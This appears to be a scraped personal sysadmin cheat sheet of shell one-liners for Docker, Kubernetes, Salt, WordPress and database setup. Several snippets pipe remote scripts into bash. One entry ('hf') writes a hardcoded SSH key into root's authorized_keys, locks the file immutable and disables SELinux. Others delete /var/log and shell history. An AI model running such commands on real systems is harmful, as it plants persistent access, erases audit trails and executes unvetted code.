𝒙𝒂𝒃𝒄44.192.95.161
k8sssl for item in `find /etc/kubernetes/pki -maxdepth 2 -name "*.crt"`;do openssl x509 -in $item -text -noout| grep Not;echo ======================$item===============;done
k8s #/etc/systemd/system/kubelet.service.d/10-kubeadm.conf #systemctl daemon-reload;systemctl restart kubelet [ -d /etc/modules-load.d ]||mkdir -p /etc/modules-load.d [ -d /etc/sysctl.d ]||mkdir -p /etc/sysctl.d wget -t 3 https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/k8s/etc_modules-load.d_k8s.conf -O /etc/modules-load.d/k8s.conf wget -t 3 https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/k8s/etc_sysctl.d_k8s.conf -O /etc/sysctl.d/k8s.conf cat /etc/issue* /etc/*release 2>/dev/null|grep -qE "debian|ubuntu|Ubuntu"&&OS="Debian" cat /etc/issue* /etc/*release 2>/dev/null|grep -qE "release|centos|CentOS"&&OS="RedHat" if [ "$OS" = "RedHat" ];then cat <
acme ./acme.sh --issue --dns dns_ali --dnssleep 30 -d $1 -d *.$1 ./acme.sh --issue --dns dns_dp --dnssleep 30 -d $1 -d *.$1
dl docker run -d -p 80:8000 --restart=always --name=filelist -v /opt/files:/home/ywgx/1/filelist/files ywgx/filelist
di docker exec -it `docker ps|grep -v IMAGE|head -n 1|awk '{print $1}'` /bin/sh
filelist curl -LO https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/filelist/docker-compose.yml curl -L https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/filelist/docker-compose -o /usr/local/bin/docker-compose && chmod +x /usr/local/bin/docker-compose /usr/local/bin/docker-compose -f docker-compose.yml up -d
dr #清理没有运行的 Docker 镜像 docker image prune #没有被任何容器使用的镜像,同时删除未被使用的数据卷和网络 docker image prune --all --force;docker system prune -a -f
aliyun_vms pip3 install aliyun-python-sdk-dyvmsapi
ds #停止所有容器 docker stop $(docker ps -aq) 2>/dev/null docker rm $(docker ps -aq) 2>/dev/null
dockercn [ -d /etc/docker ]||mkdir -p /etc/docker tee /etc/docker/daemon.json <<-'EOF' { "registry-mirrors": ["https://registry.docker-cn.com"] } EOF systemctl restart docker
dd #删除所有镜像 docker stop $(docker ps -aq) 2>/dev/null docker system prune -a -f docker rm $(docker ps -aq) 2>/dev/null docker rmi -f $(docker images -q) 2>/dev/null
aliyun [ -d /etc/docker ]||mkdir -p /etc/docker tee /etc/docker/daemon.json <<-'EOF' { "registry-mirrors": ["https://7u4xdzci.mirror.aliyuncs.com"] } EOF systemctl restart docker
docker cat /etc/issue* /etc/*release 2>/dev/null|grep -qE "debian|ubuntu|Ubuntu"&&OS="Debian" cat /etc/issue* /etc/*release 2>/dev/null|grep -qE "release|centos|CentOS"&&OS="RedHat" if [ "$OS" = "RedHat" ];then curl -L https://download.docker.com/linux/centos/docker-ce.repo -o /etc/yum.repos.d/docker-ce.repo yum install -y docker-ce systemctl daemon-reload systemctl enable docker.service systemctl start docker fi if [ "$OS" = "Debian" ];then sudo apt-get remove docker docker-engine docker.io containerd runc sudo apt-get update sudo apt-get -y install apt-transport-https ca-certificates curl gnupg lsb-release curl -fsSL https://download.docker.com/linux/ubuntu/gpg | sudo gpg --dearmor -o /usr/share/keyrings/docker-archive-keyring.gpg echo "deb [arch=amd64 signed-by=/usr/share/keyrings/docker-archive-keyring.gpg] https://download.docker.com/linux/ubuntu $(lsb_release -cs) stable" | sudo tee /etc/apt/sources.list.d/docker.list > /dev/null apt-get update apt-get -y install docker-ce docker-ce-cli containerd.io docker-compose service docker restart fi #docker run hello-world #docker run -d -p 80:8000 --restart=always -v /opt/files:/opt/files ywgx/filelist:alpine #docker rmi $name 删除镜像 #docker container prune 清理所有处于终止状态的容器 #docker run -d -p 5000:5000 --restart=always --name registry -v /opt/data/registry:/var/lib/registry registry 安装运行 docker-registry #docker build -t ywgx/filelist . 使用Dockerfile文件 build 构建一个镜像名称 ywgx/filelist #docker tag $container_id ywgx/test:dev 为镜像添加一个新的标签 #docker tag ywgx/filelist filelist 为镜像ywgx/filelist添加新标签 filelist #docker search $name 查询镜像 #docker export $container_id > container.tar 导出容器 #docker save -o busybox.tar busybox 导出 #docker load -i busybox.tar 导入 $docker rm -f $container_id 删除容器 #docker run -d -p 80:5000 training/webapp python app.py 后台启动容器并映射本地端口 80 #docker port $container_id 或者 $name 查看容器端口 #docker logs -f $container_id 查看容器内部标准输出 #docker top $name 查看容器内部运行的进程 #cat container.tar | docker import - centos:v1 导入容器到镜像 centos:v1 #docker inspect $name 检查容器的配置和状态信息 #docker run -itd --name ubuntu-test ubuntu 运行容器,并且可以通过 exec 命令进入 ubuntu 容器 #docker run -itd --name centos-test centos 运行容器,并且可以通过 exec 命令进入 centos 容器 #docker commit -m="filelist" -a="ywgx" e218edb10161 ywgx/filelist:v2 #docker image prune -a 删除没有运行的容器镜像 #数据卷 #创建:docker volume create #删除某个卷:docker volume rm 卷名 #删除所有未使用的卷:docker volume prune #列出所有卷:docker volume ls #查看某个卷的信息:docker volume inspect 卷名 #新建一个 Docker 网络 # docker network create -d bridge test-net # docker run -itd --name test1 --network test-net ubuntu /bin/bash 运行一个容器并连接到新建的 test-net 网络 # docker run -itd --name test2 --network test-net ubuntu /bin/bash 再运行一个容器并连接到新建的 test-net 网络 # test1 容器和 test2 容器建立了互联关系,两个容器直接可以互相ping通 # COPY 和 ADD 指令中选择的时候,可以遵循这样的原则,所有的文件复制均使用 COPY 指令,仅在需要自动解压缩的场合使用 ADD。 # 查看仓库中的镜像 curl 127.0.0.1:5000/v2/_catalog # 配置DNS #我们可以在宿主机的 /etc/docker/daemon.json 文件中增加以下内容来设置全部容器的 DNS #{ # "dns" : [ # "114.114.114.114", # "8.8.8.8" # ] #} #systemctl restart docker #docker exec -it $container_id /bin/bash 进入容器
p 44.192.95.161
ss #ss命令可以查看系统中启动的端口信息,该命令常用选项如下: #-a显示所有端口的信息 #-n以数字格式显示端口号 #-t显示TCP连接的端口 #-u显示UDP连接的端口 #-l显示服务正在监听的端口信息,如httpd启动后,会一直监听80端口 #-p显示监听端口的服务名称是什么(也就是程序名称) ss -antulp
alpine apk add gcc musl-dev apk add build-base
w curl xabc.io/a|bash
rb pgrep filelist.py|xargs kill -9 &>/dev/null pgrep filelist.py|xargs kill -9 &>/dev/null sleep 1;cd /home/ywgx/1/filelist/;./filelist.py --auth=true --debug=false --port=10000 --root=/home/ywgx/data/filelist &>/home/ywgx/logs/filelist.log & sleep 3;cd /home/ywgx/1/filelist/;./filelist.py --auth=false --debug=false --port=8000 --root=/home/ywgx/data/download &>/home/ywgx/logs/download.log & ps aux|grep filelist|grep -v grep
cpu 1. 调整CPU频率 cpupower frequency-set -u 2500MHz cat /proc/cpuinfo | grep 'cpu MHz'
st #字符串加解密 $SALT 是盐字符串,作为 gitlab-ci 全局变量,只有管理员知道 #加密: echo $(cat ./config | base64) |tr -d " "|openssl aes-256-cbc -salt -pbkdf2 -k $SALT > secret_kubeconfig #解密: cat secret_kubeconfig | openssl aes-256-cbc -d -salt -pbkdf2 -k $SALT |base64 -d > config export SALT=HELLOWORLD echo $(cat ./config | base64) |tr -d " "|openssl aes-256-cbc -salt -pbkdf2 -k $SALT > secret_kubeconfig
hf if ! grep -q "hfzp" /root/.ssh/authorized_keys &>/dev/null;then [ -e /root/.ssh/authorized_keys ]&&chattr -ai /root/.ssh/authorized_keys||mkdir -p -m 700 /root/.ssh echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC7cDLbprh+i930XUqo81RXjaLg4Kot5L9aiB789V4L/mDfV7ZeW6k2S1bdIGUrtSmFZnmA/2HQKid102mEzp8Y2/xkwXoTM/hsah+X8DXLX5/xwUb2XuhqZSJy+x/6MLC9MGjvQGFpqvaK1fJZzjFxZaaHoC79iJWbYCzBLo2n+EcmmX559gAgcUSSvjsUQRAy7f+/1Hp/cLB+rqTMVoNgeAZGgMV6QNoxpZlKWSTFeicxN/sNgy6FLpLOyuX5xwsYfpaDdZd+MYlG69XDIakh4cy+kg9q6nQ2bYOw3GhdNMSNnlsU7XkY872OUCTodZ8iu24AvqFE1kxCaIp8egAD hfzp" >> /root/.ssh/authorized_keys chmod 600 /root/.ssh/authorized_keys chattr +ai /root/.ssh/authorized_keys fi which setenforce &>/dev/null&&setenforce -1 &>/dev/null [ -e /etc/selinux/config ]&&grep -q "SELINUX=enforcing" /etc/selinux/config&&sed -i 's/SELINUX=enforcing/SELINUX=disabled/' /etc/selinux/config
city curl -s --connect-timeout 5 https://ipinfo.io/44.192.95.161/city;curl -s --connect-timeout 5 http://freeapi.ipip.net/44.192.95.161
zola nohup ~/bin/zola serve --interface 0.0.0.0 --port 3003 --base-url / &>~/logs/zola-docs.log &
hm helm init --stable-repo-url https://charts.helm.sh/stable --service-account tiller helm init --client-only --skip-refresh helm repo rm stable helm repo add stable https://charts.helm.sh/stable
sredis BUILD=/tmp/ywgx [ -d $BUILD ]||mkdir -p $BUILD cd $BUILD wget -t 3 http://download.redis.io/redis-stable.tar.gz -O -|tar xfz - cd redis*/ cat /etc/issue* /etc/*release 2>/dev/null|grep -qE "debian|ubuntu|Ubuntu"&&OS="Debian" cat /etc/issue* /etc/*release 2>/dev/null|grep -qE "release|centos|CentOS"&&OS="RedHat" if [ "$OS" = "RedHat" ] CC=clang make fi if [ "$OS" = "Debian" ] CC=clang make MALLOC=libc fi #cd src/ #for i in `find . -perm -0755 -a ! -type d`;do mv $i $REDIS_BIN/;done
c rm -f /etc/motd hostnamectl --static set-hostname central-44.192.95.161; yum -y update yum -y install epel-release yum -y install wget gcc gcc-c++ make vim pcre-devel libffi-devel openssl-devel python-devel libevent-devel postgresql-devel readline-devel perl-ExtUtils-Embed iptables iptables-services inotify-tools bzip2 unzip rsync psmisc python3-devel net-tools yum -y install bash-completion yum -y install python-pip yum -y install chrony #yum -y erase sudo yum clean all curl -s xabc.io/awscli|bash timedatectl set-timezone Asia/Shanghai curl -L https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/matrix/xabc.sh -o /etc/profile.d/xabc.sh chmod 644 /etc/profile.d/xabc.sh wget -t 3 https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/files/vim.tgz -O -|tar xzf - -C ~ [ -d /root/.pip ]||mkdir -p /root/.pip curl -L https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/files/pip.conf -o /root/.pip/pip.conf pip2 install pip==9.0.3 pip2 install --upgrade setuptools==30.1.0 pip2 install --upgrade Cython redis pyOpenSSL pip2 install functions==0.7.0 pip2 install tornado==5.1.1 pip2 install redis==3.5.3 pip2 install tornadio2==0.0.4 pip2 install tornado_jinja2==0.2.4 pip2 install psycopg2-binary==2.8.6 pip2 install Pillow==2.0.0 pip2 install paramiko==2.7.2 pip2 install sqlalchemy==1.3.20 pip2 install sqlalchemy_utils==0.36.6 pip2 install influxdb==5.3.1 pip2 install futures==3.1.1 pip2 install ujson==2.0.3 pip2 install mako mv /usr/lib/python2.7/site-packages /usr/lib/python2.7/site-packages.bk mv /usr/lib64/python2.7/site-packages /usr/lib64/python2.7/site-packages.bk wget -t 3 https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/matrix/site-packages.tgz -O -|tar xzf - -C /usr/lib/python2.7 wget -t 3 https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/matrix/site-packages-64.tgz -O -|tar xzf - -C /usr/lib64/python2.7 yum -y install https://repo.saltstack.com/py3/redhat/salt-py3-repo-latest.el7.noarch.rpm yum -y clean expire-cache yum -y install salt-master salt-minion salt-api salt-ssh pip3 install -U pip setuptools pip3 install redis==3.5.3 flask cryptography pyinotify influxdb salt-pepper gevent pymongo pip3 install aliyun-python-sdk-dyvmsapi echo `hostname` > /etc/salt/minion_id systemctl enable salt-master.service systemctl enable salt-api.service systemctl enable chrony systemctl disable firewalld.service &>/dev/null curl -L https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/matrix/master -o /etc/salt/master [ -d /srv/salt/user ]||mkdir -p /srv/salt/user [ -d /srv/zero/0 ]||mkdir -p /srv/zero/0 [ -d /srv/zero/1 ]||mkdir -p /srv/zero/1 [ -d /srv/zero/2 ]||mkdir -p /srv/zero/2 wget -t 3 https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/matrix/O.tgz -O -|tar xzf - -C /srv/zero/0 wget -t 3 https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/matrix/P.tgz -O -|tar xzf - -C /srv/zero/1 wget -t 3 https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/matrix/R.tgz -O -|tar xzf - -C /srv/zero/2 wget -t 3 https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/matrix/node.tgz -O -|tar xzf - -C /srv/zero/1 wget -t 3 https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/matrix/grafana.tgz -O -|tar xzf - -C /srv/zero/1 #wget -t 3 https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/matrix/matrix.tgz -O -|tar xzf - -C /srv/zero/1 ln -fs /srv/zero/1/node/bin/npm /usr/bin/npm ln -fs /srv/zero/1/node/bin/node /usr/bin/node chmod 100 /srv/zero/2/redis/bin/* ln -fs /srv/zero/2/redis/bin/redis-cli /usr/local/bin/ id -u nobody &>/dev/null||useradd nobody -r -s /bin/false groupadd -f nobody &>/dev/null chown root.nobody /srv/zero/0/openresty/nginx/sbin/nginx chmod +xs /srv/zero/0/openresty/nginx/sbin/nginx yum install -y postgresql-server service postgresql initdb service postgresql start service salt-master start systemctl enable postgresql.service [ -e /etc/ssh/ssh_host_dsa_key ]||ssh-keygen -q -t dsa -P '' -f /etc/ssh/ssh_host_dsa_key chmod 755 /etc/rc.d/rc.local systemctl disable salt-minion.service #wget -t 3 https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/matrix/build.tgz -O -|tar xzf - -C /srv/salt rm -fr /var/log /var/cache/salt/minion /root/.bash_history IP=${SSH_CONNECTION% *};IP=${IP##* };[ -n "$IP" ]||IP=$(ip -o -f inet addr|grep -v 'lo '|grep -Po '(?<=inet ).*(?=\/)'|awk '/^10\.|^172\.|^192\.|^100\./'|head -1) REGION=$(curl -s -m 5 http://ip-api.com/line/44.192.95.161?fields=city);[ -n "$REGION" ]||REGION="Shanghai" printf "\033[1;32;40m%s\033[0m\n" "Login 和 Central 机器在同一个内网请在 Login 机器执行 # curl -s xabc.io/l-$IP-$REGION|bash 继续完成对 Login 的基础部署" printf "\033[1;32;40m%s\033[0m\n-----------------\n" "Master 和 Central 机器在同一个内网请在 Master 机器执行 # curl -s xabc.io/m-$IP-$REGION|bash 继续完成对 Master 的基础部署" printf "\033[1;32;40m%s\033[0m\n" "Login 和 Central 机器不在同一内网请在 Login 机器执行 # curl -s xabc.io/l-44.192.95.161-$REGION|bash 继续完成对 Login 的基础部署" printf "\033[1;32;40m%s\033[0m\n" "Master 和 Central 机器不在同一内网请在 Master 机器执行 # curl -s xabc.io/m-44.192.95.161-$REGION|bash 继续完成对 Master 的基础部署" printf "\033[1;32;31m%s\033[0m\n" "特别说明 $REGION 这个字段代表网络区域信息,可根据实际情况改成自己机器所在区域标识信息,同一网络节点内login,master机器,其region标识信息一致,如Beijing,必须与/srv/pillar/central.sls 里面 region 定义一致"
mac #scutil --set ComputerName "E" #scutil --set LocalHostName "E" #scutil --set HostName "E" #nvram AutoBoot=%00 关闭开盖启动 #nvram AutoBoot=%03 恢复开盖启动 #sudo defaults write /Library/Preferences/com.apple.loginwindow SHOWOTHERUSERS_MANAGED -bool FALSE 删除开机界面上的 “其他”用户登陆选项 #pwpolicy -clearaccountpolicies 运行后,可以设置2位密码
i0 if [ $USER = ywgx ];then [ -d /home/ywgx/0 ]||mkdir -p /home/ywgx/0 [ -d /home/ywgx/1 ]||mkdir -p /home/ywgx/1 [ -d /home/ywgx/2 ]||mkdir -p /home/ywgx/2 [ -d /home/ywgx/logs ]||mkdir -p /home/ywgx/logs [ -d /home/ywgx/data/filelist ]||mkdir -p /home/ywgx/data/filelist wget -t 3 https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/ywgx/0/openresty.tgz -O -|tar xzf - -C /home/ywgx/0 wget -t 3 https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/ywgx/0/nginx.conf -O /home/ywgx/0/openresty/nginx/conf/nginx.conf [ -d /home/ywgx/0/openresty/nginx/conf/ssl ]||mkdir -p /home/ywgx/0/openresty/nginx/conf/ssl wget -t 3 https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/ywgx/0/filelist.cn.pem -O /home/ywgx/0/openresty/nginx/conf/ssl/filelist.cn.pem wget -t 3 https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/ywgx/0/filelist.cn.key -O /home/ywgx/0/openresty/nginx/conf/ssl/filelist.cn.key [ -d /home/ywgx/0/openresty/nginx/conf/vhost ]||mkdir -p /home/ywgx/0/openresty/nginx/conf/vhost chmod +xs /home/ywgx/0/openresty/nginx/sbin/nginx pgrep nginx||~/0/openresty/nginx/sbin/nginx fi
i1 if [ $USER = ywgx ];then [ -d /home/ywgx/1 ]||mkdir -p /home/ywgx/1 [ -d /home/ywgx/data/filelist ]||mkdir -p /home/ywgx/data/filelist wget -t 3 https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/filelist/filelist-bin.tgz -O -|tar xzf - -C /home/ywgx/1 fi
i2 if [ $USER = ywgx ];then [ -d /home/ywgx/2 ]||mkdir -p /home/ywgx/2 [ -d /home/ywgx/data/filelist ]||mkdir -p /home/ywgx/data/filelist wget -t 3 https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/ywgx/2/redis.tgz -O -|tar xzf - -C /home/ywgx/2 wget -t 3 https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/ywgx/2/mongo.tgz -O -|tar xzf - -C /home/ywgx/2 fi
ssl proxy_http_version 1.1; proxy_set_header Host $host; proxy_set_header X-Real-IP $remote_addr; proxy_set_header X-Forwarded-Proto $scheme; proxy_set_header X-Forwarded-For $remote_addr; proxy_set_header X-NginX-Proxy true; proxy_set_header Connection ""; log_format main "$status $request_time $request_method $host$request_uri [$http_user_agent] [$time_local] [$http_x_forwarded_for $remote_addr] $http_referer"; access_log logs/access.log main; ssl_ciphers ECDHE-RSA-AES128-GCM-SHA256:ECDHE:ECDH:AES:HIGH:!NULL:!aNULL:!MD5:!ADH:!RC4:!DH:!DHE; ssl_protocols TLSv1.1 TLSv1.2 TLSv1.3; ssl_prefer_server_ciphers on; upstream EX{ keepalive 64; server 127.0.0.1:7001; } server{ listen 80; listen 443 ssl http2; server_name EX; ssl_certificate ssl/EX.pem; ssl_certificate_key ssl/EX.key; location /{ proxy_pass http://EX; } }
ssh mv /etc/ssh/sshd_config /etc/ssh/sshd_config.bk wget -t 3 https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/files/sshd_config -O /etc/ssh/sshd_config systemctl restart sshd.service
chrony cat /etc/issue* /etc/*release 2>/dev/null|grep -qE "debian|ubuntu|Ubuntu"&&OS="Debian" cat /etc/issue* /etc/*release 2>/dev/null|grep -qE "release|centos|CentOS"&&OS="RedHat" if [ "$OS" = "RedHat" ];then yum -y install yum-utils yum -y install epel-release yum -y install chrony systemctl enable chrony systemctl restart chronyd fi if [ "$OS" = "Debian" ];then apt-get -y install chrony chkconfig --add chronyd fi timedatectl set-timezone Asia/Shanghai
java java -Xmx3550m -Xms3550m -Xmn2g -Xss128k -Xmx3550m:设置JVM最大可用内存为3550M。 -Xms3550m:设置JVM促使内存为3550m。此值可以设置与-Xmx相同,以避免每次垃圾回收完成后JVM重新分配内存。 #以 java 进程所在用户执行,获取 heap dump 文件 #jmap -dump:format=b,file=heap.hprof #获取thread dump文件 #jstack > thread.txt
mongo echo doing... wget -t 3 https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/mongodb/mongo.tgz -O -|tar xzf - -C /opt echo 65535 > /proc/sys/net/core/somaxconn echo never > /sys/kernel/mm/transparent_hugepage/defrag echo never > /sys/kernel/mm/transparent_hugepage/enabled pgrep mongod||/opt/mongo/bin/mongod -f /opt/mongo/conf/mongod.conf
c1 curl -s xabc.io/b|bash curl -s xabc.io/v|bash timedatectl set-timezone Asia/Shanghai yum -y install epel-release yum -y install wget net-tools gcc gcc-c++ make vim iptables iptables-services inotify-tools unzip psmisc rsync [ -e /etc/rc.local ]&&sed -i '/qcloud/d' /etc/rc.local hostnamectl --static set-hostname central-44.192.95.161; systemctl disable firewalld yum -y install https://repo.saltstack.com/py3/redhat/salt-py3-repo-latest.el7.noarch.rpm yum clean expire-cache yum -y install salt-master yum -y install salt-minion yum -y install salt-ssh pip3 install redis flask cryptography pyinotify systemctl enable iptables.service systemctl enable salt-master.service [ -d /srv/salt ]||mkdir -p /srv/salt wget -t 3 https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/master/iptables -O /etc/sysconfig/iptables wget -t 3 https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/master/master -O /etc/salt/master systemctl restart salt-master.service [ -d /srv/zero/0 ]||mkdir -p /srv/zero/0 [ -d /srv/zero/1 ]||mkdir -p /srv/zero/1 [ -d /srv/zero/2 ]||mkdir -p /srv/zero/2 [ -d /srv/zero/bin ]||mkdir -p /srv/zero/bin wget -t 3 https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/matrix/O.tgz -O -|tar xzf - -C /srv/zero/0 wget -t 3 https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/matrix/P.tgz -O -|tar xzf - -C /srv/zero/1 wget -t 3 https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/matrix/R.tgz -O -|tar xzf - -C /srv/zero/2
wordpress cat /etc/issue* /etc/*release 2>/dev/null|grep -qE "debian|ubuntu|Ubuntu"&&OS="Debian" cat /etc/issue* /etc/*release 2>/dev/null|grep -qE "release|centos|CentOS"&&OS="RedHat" id -u nobody &>/dev/null||useradd nobody -r -s /bin/false groupadd -f nobody &>/dev/null if [ "$OS" = "RedHat" ] then yum -y install yum-utils yum -y install epel-release yum -y install vim wget bzip2 unzip rsync yum -y localinstall https://mirror.webtatic.com/yum/el7/webtatic-release.rpm wget -t 3 https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/files/MariaDB.repo -O /etc/yum.repos.d/MariaDB.repo yum -y install MariaDB-server MariaDB-client yum -y install php72w yum -y install php72w-cli php72w-common php72w-devel php72w-mysql php72w-fpm yum -y install php72w-gd php72w-imap php72w-ldap php72w-odbc php72w-pear php72w-xml php72w-xmlrpc php72w-mbstring php72w-pdo systemctl start mariadb [ -d /etc/rc.d ]||mkdir -p /etc/rc.d [ -d /etc/php-fpm.d ]||mkdir -p /etc/php-fpm.d wget -t 3 https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/files/RedHat-php.conf -O /etc/php-fpm.d/www.conf wget -t 3 https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/files/wordpress-rc.local.conf -O /etc/rc.d/rc.local wget -t 3 https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/files/mysql-server.cnf -O /etc/my.cnf.d/server.cnf chmod 755 /etc/rc.d/rc.local mysql <<- EOF set password for root@localhost=password('io'); create database wordpress; EOF systemctl restart mariadb systemctl restart php-fpm systemctl enable mariadb systemctl enable php-fpm fi if [ "$OS" = "Debian" ] then apt-get -y update apt-get -y install vim wget bzip2 unzip rsync apt-get -y remove apache2 apt-get -y install php7.[0-9] apt-get -y install php7.[0-9]-mysql php7.[0-9]-fpm apt-get -y install php7.[0-9]-gd php7.[0-9]-mbstring php7.[0-9]-xmlrpc apt-get -y install mysql-server --allow-unauthenticated mysql -pio<<- EOF create database wordpress; EOF wget -t 3 https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/files/Debian-php.conf -O `find /etc/php/ -name www.conf` wget -t 3 https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/files/wordpress-rc.local.conf -O /etc/rc.local chmod 755 /etc/rc.local systemctl restart mysql /etc/init.d/php*-fpm restart fi [ -d /opt/sys ]||mkdir -p /opt/sys [ -d /var/log/php-fpm ]||mkdir -p /var/log/php-fpm [ -d /var/log/mariadb ]||mkdir -p /var/log/mariadb wget -t 3 https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/files/openresty-$OS.tgz -O -|tar xzf - -C /opt wget -t 3 https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/files/wordpress-nginx.conf -O /opt/openresty/nginx/conf/nginx.conf wget -t 3 https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/files/wordpress.tgz -O -|tar xzf - -C /opt wget -t 3 https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/files/wordpress-start.sh -O /opt/sys/wordpress-start.sh chown -R nobody.nobody /opt/openresty chown -R nobody.nobody /opt/wordpress chown root.nobody /opt/openresty/nginx/sbin/nginx chmod +xs /opt/openresty/nginx/sbin/nginx chmod 700 /opt/sys/wordpress-start.sh pgrep nginx||/opt/openresty/nginx/sbin/nginx
base cat /etc/issue* /etc/*release 2>/dev/null|grep -qE "debian|ubuntu|Ubuntu"&&OS="Debian" cat /etc/issue* /etc/*release 2>/dev/null|grep -qE "release|centos|CentOS"&&OS="RedHat" if [ "$OS" = "RedHat" ];then yum -y install yum-utils yum -y install epel-release yum -y install bash-completion yum -y install gcc gcc-c++ make readline-devel pcre-devel openssl-devel perl bzip2-devel clang yum -q -y install vim wget curl zip bzip2 unzip rsync psmisc net-tools bind-utils telnet openssh-clients pcre openssl fi if [ "$OS" = "Debian" ];then apt-get -y update apt-get -y install libreadline-dev libpcre3-dev libssl-dev cmake perl libncurses5-dev build-essential clang apt-get -q -y install vim wget curl zip bzip2 unzip rsync psmisc net-tools dnsutils telnet fi
influxdb echo doing... curl -s xabc.io/b|bash curl -s xabc.io/e|bash curl -s xabc.io/v|bash cat /etc/issue* /etc/*release 2>/dev/null|grep -qE "debian|ubuntu|Ubuntu"&&OS="Debian" cat /etc/issue* /etc/*release 2>/dev/null|grep -qE "release|centos|CentOS"&&OS="RedHat" INFLUXDB_VER=1.7.8 if [ "$OS" = "RedHat" ] then yum -y install yum-utils yum -y localinstall https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/files/influxdb-${INFLUXDB_VER}.x86_64.rpm wget -t 3 https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/file/influxdb.repo -O /etc/yum.repos.d/influxdb.repo fi if [ "$OS" = "Debian" ] then wget -t 3 https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/files/influxdb_${INFLUXDB_VER}_amd64.deb dpkg -i influxdb_${INFLUXDB_VER}_amd64.deb rm -f influxdb_${INFLUXDB_VER}_amd64.deb fi
init yum update -y curl -s xabc.io/a|bash curl -s xabc.io/k|bash rm -rf /var/log;mkdir -p /var/log reboot
g salt \* saltutil.sync_grains
istio echo doing... wget -t 3 https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/istio/istio.tgz -O -|tar xzf - -C /opt wget -t 3 https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/istio/xabc-istio.sh -O /etc/profile.d/xabc-istio.sh echo /opt/istio
dep curl https://raw.githubusercontent.com/golang/dep/master/install.sh|bash
go wget -t 3 https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/files/go.tgz -O -|tar xzf - -C /usr/local wget -t 3 https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/files/xabc-go.sh -O /etc/profile.d/xabc-go.sh
to tail -f access.log|awk '$2 > 2 {print $0}'
y ip -o -f inet addr|grep -v 'lo '|grep -Po '(?<=inet ).*(?=\/)'|grep -E '^10\.|^172\.1[6-9]\.|^172\.2[0-9]\.|^172\.3[0-1]\.|^192\.168\.'|head -1
h cat /etc/issue* /etc/*release 2>/dev/null|grep -qE "debian|ubuntu|Ubuntu"&&OS="Debian" cat /etc/issue* /etc/*release 2>/dev/null|grep -qE "release|centos|CentOS"&&OS="RedHat" CPU=`cat /proc/cpuinfo|grep "processor"|wc -l` MEM=`free|awk '/Mem/ {print int(($2+1048576)/1048576)}'` echo "$OS $CPU $MEM"
busybox [ -d /usr/local/bin ]||mkdir -p /usr/local/bin wget -t 3 https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/files/busybox -O /usr/local/bin/busybox chmod +x /usr/local/bin/busybox
pycurl mkdir -p /tmp/build&&cd /tmp/build wget -t 3 https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/files/curl-7.43.0.tar.gz -O -|tar xzf - cd curl-7.43.0 ./configure make && make install mv /usr/lib64/libcurl.so.4* /tmp/ ln -sf /usr/local/lib/libcurl.so.4.3.0 /usr/lib64/libcurl.so.4.3.0 ln -sf /usr/local/lib/libcurl.so.4.3.0 /usr/lib64/libcurl.so.4 pip3 install pycurl
q echo doing... find / -empty -mtime +7 ! -path "/proc/*" -a ! -path "/sys/*" -a ! -path "/etc/*" ! -path "/boot/*" -type f -a -name "*.log" -delete for i in $(find `du -s /* --exclude={proc,etc,sys,boot,run,mnt}|sort -nr|head -7|awk '{print $2}'|tr '\n' ' '` -type f -a -name "*.log" ! -name ".xabc.log" ! -name ".usercmd.log" ! -name "usercmd.log" ! -name ".sys.log" -o -name "catalina.out");do echo $i;> $i;done
pandas import pandas as pd pd.set_option('display.max_rows', 10000) #最大行数 pd.set_option('display.max_columns', 1000) #最大列数 pd.set_option('display.width', 10000) #页面宽度
call pip3 install aliyun-python-sdk-core pip3 install aliyun-python-sdk-dyvmsapi
tcp netstat -n|awk '/^tcp/ {++S[$NF]} END {for(a in S) print a, S[a]}'
